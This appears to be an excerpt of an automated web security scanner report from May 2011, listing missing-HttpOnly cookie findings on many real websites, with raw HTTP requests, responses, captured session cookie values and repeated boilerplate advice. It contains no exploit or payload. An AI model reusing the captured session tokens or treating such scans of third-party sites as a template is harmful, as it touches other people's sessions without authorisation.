GET / HTTP/1.1 Host: www.capterra.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /vendita HTTP/1.1 Host: www.casa.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/advproductsearch.cws_home HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:25 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 18145 Set-Cookie: JSESSIONID=0000chAFJT9k1-7riqUcTLttp8R:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/journaldescription.cws_home/939/description HTTP/1.1 Host: www.elsevier.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:31:34 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 29074 Set-Cookie: JSESSIONID=0000Cjq87kPWlgkIPjknm4Tfz-d:142fmli5a; Path=/ Content-Type: text/html; charset=UTF-8 Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wps/find/subject_area_browse.cws_home HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:24 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Set-Cookie: JSESSIONID=00000tgzsbHpQGPfwgTcttEOHZ3:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 209320
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GlfeWeb/gl/it/home.html HTTP/1.1 Host: www.genialloyd.it Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1 Host: www.webank.it Connection: keep-alive Referer: http://www.webank.it/lndpage/promo321.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1 Host: www.yoox.com Proxy-Connection: keep-alive Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 22:31:04 GMT Expires: Mon, 02 May 2011 22:31:04 GMT Cache-Control: private Content-Length: 5973
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 23:54:10 GMT Expires: Mon, 02 May 2011 23:54:10 GMT Cache-Control: private Content-Length: 244
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1 Host: ad78.neodatagroup.com Proxy-Connection: keep-alive Referer: http://www.ansa.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml" Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com; Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 758 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close
var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1 Host: adv.ilsole24ore.it Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:13:39 GMT Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8 Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI" Content-Length: 37380 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: application/x-javascript
function OAS_RICH(position) { if (position == 'BackGround') { document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1 Host: adv.ilsole24ore.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P> <HR> <A ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /question/index HTTP/1.1 Host: answers.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:12 GMT Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Status: 404 Not Found Imagetoolbar: Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 31141
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-us" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: assicurazione-auto.ansa.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:23:34 GMT Server: Apache X-Powered-By: PHP/5.2.9-3eks Set-Cookie: ASSICURAZIONE=7df3ca5deff089f37cd94af9899acff2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: Private Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
slat=1304375040; domain=.alice.it; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aap/serviceforwarder HTTP/1.1 Host: auth.rossoalice.alice.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 02 May 2011 22:23:33 GMT Server: Apache Location: http://maileservizi.alice.it/home/login.html Set-Cookie: slat=1304375040; domain=.alice.it; path=/ Connection: close Content-Type: text/html Content-Length: 283
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://maileservizi.alice.it/home/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com; Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com; Content-Type: image/gif Content-Length: 49 Date: Mon, 02 May 2011 22:16:38 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:25:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private cache-control: no-cache Content-Length: 5898 Content-Type: text/html Expires: Sun, 01 May 2011 21:25:26 GMT Set-Cookie: HELM=Interface=&NonSecureReturnURL=&LanguageCode=EN&Password=&Username=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/ ACCEPT-RANGES: none
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1 Host: del.icio.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:24:02 GMT Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/post Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: en.camera.it Proxy-Connection: keep-alive Referer: http://www.camera.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/company/corporate-communication/eni-social-media/eni-social-media.shtml HTTP/1.1 Host: eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:08 GMT Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: TS782077=4d646e48ff1d60f4107961ec3cc649fa38ef4af4554824e14dbf2f07; Path=/ Content-Length: 63332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Eni in the Soc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/company/culture-energy/figures/figures.shtml HTTP/1.1 Host: eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:10 GMT Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: TS782077=26e351c880aaf249c0f13815ae124e8174633c80af6e09a34dbf2f09; Path=/ Content-Length: 64780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>World Oil and ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_IT/sustainability/news/2010-10-20-eni-global-leaders-2010.shtml HTTP/1.1 Host: eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:11 GMT Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: TS782077=d85108374d59830f57586c5e4199fa2db6bcad4b4472ab294dbf2f0a; Path=/ Content-Length: 57713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Eni ranks firs ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /share HTTP/1.1 Host: friendfeed.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
